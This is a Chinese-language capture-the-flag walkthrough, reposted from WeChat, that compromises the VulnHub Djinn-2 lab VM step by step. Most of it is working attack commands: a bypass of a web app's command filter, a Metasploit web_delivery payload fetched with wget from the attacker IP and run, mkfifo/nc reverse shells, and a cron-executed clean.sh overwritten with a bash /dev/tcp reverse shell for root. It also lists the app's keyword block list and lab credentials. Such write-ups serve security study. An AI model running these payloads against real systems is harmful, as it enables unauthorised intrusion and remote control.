Djinn-2

admin 2025年3月12日22:38:01评论6 views字数 1793阅读5分58秒阅读模式

下载地址:https://download.vulnhub.com/djinn/djinn-2.ova

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.135 仅主机 vxbox

主机发现

arp-scan -l

Djinn-2

端口扫描

nmap -p- -sV 192.168.56.135

Djinn-2

发现21ftp端口,尝试匿名登录

anyonmous/anonymous

Djinn-2

查看ftp的文件

nitu:7846A$56

似乎是用户名和密码

Djinn-2

ssh远程登录失败

Djinn-2

目录扫描

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.56.135:7331

Djinn-2

访问robots.txt,获得letshack

访问source获得游戏的源码

获得关键信息

URL = "http://{}:5000/?username={}&password={}"

访问wish获得被安全过滤的命令框框

Djinn-2

Djinn-2

Djinn-2

结合5000端口不允许get,把get换成post

Djinn-2

POST /?username=ls+-al&password

ls -al返回是空,所以加个+

Djinn-2

可以达到一样的效果

curl -X POST http://192.168.56.135:5000/?username=id&password=

Djinn-2

POST /?username=cat+app.py&password HTTP/1.1

过滤了一些东西

RCE = ["|", "*", "^", "$", ";", "nc", "bash", "bin", "eval", "python"]

Djinn-2

绕过

使用msf反弹

msfconsoleuse exploit/multi/script/web_deliveryset target 7/set target Linux注意:target为linuxset payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.56.132 如果端口被占用就设置成set srvport 8081run

Djinn-2

wget -qO tl1961j8 --no-check-certificate http://192.168.56.132:8081/5Pk1Zf3r9ce

chmod +x tl1961j8; ./tl1961j8& disown

复制出来之后需要注意三点:

(1)不能直接全部粘上去执行,因为前面是过滤分号的

(2)传参的地方不能直接使用空格,空格可以使用%20或者+代替

(3)下载之后需要指定路径为tmp,所以上面的命令需要修改一点点

wget+-qO+/tmp/tl1961j8+--no-check-certificate+http://192.168.56.132:8081/5Pk1Zf3r9ce

POST /?username=wget+-qO+/tmp/tl1961j8+--no-check-certificate+http://192.168.56.132:8081/5Pk1Zf3r9ce&password HTTP/1.1

Djinn-2

下载成功

Djinn-2

给权限

Djinn-2

运行

Djinn-2

msf上向城管,msf反弹shell到kali

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.132 1111 >/tmp/f

Djinn-2

/var/backups发现nitu.kdbx

文件传输

Djinn-2

Djinn-2

密码就是creds.txt里面的7846A$56

&HtMGd$LJB

Djinn-2

ssh连接

nitish/&HtMGd$LJB

Djinn-2

发现2843端口

Djinn-2

nc 127.0.0.1 2843

Djinn-2

6,查看notes会cat一下

Djinn-2

5nmae设置为/etc/passwd发现可以读取到内容

Djinn-2

使用|拼接命令

/etc/passwd/ | id

Djinn-2

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i 2>&1|nc 192.168.56.132 9999 >/tmp/f2

Djinn-2

Djinn-2

嘿0xmzfr,我已经安装了你让我在我的主目录中的文件夹,因为我会离开一两天,你可以只留下clean.sh在该目录和cronjob将处理其余的。

Djinn-2

echo "bash -i >& /dev/tcp/192.168.56.132/6666 0>&1" >clean.sh

Djinn-2

Djinn-2

由于是自动执行,所以得等一会

Djinn-2

原文始发于微信公众号(王之暴龙战神):Djinn-2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月12日22:38:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Djinn-2https://cn-sec.com/archives/3830882.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息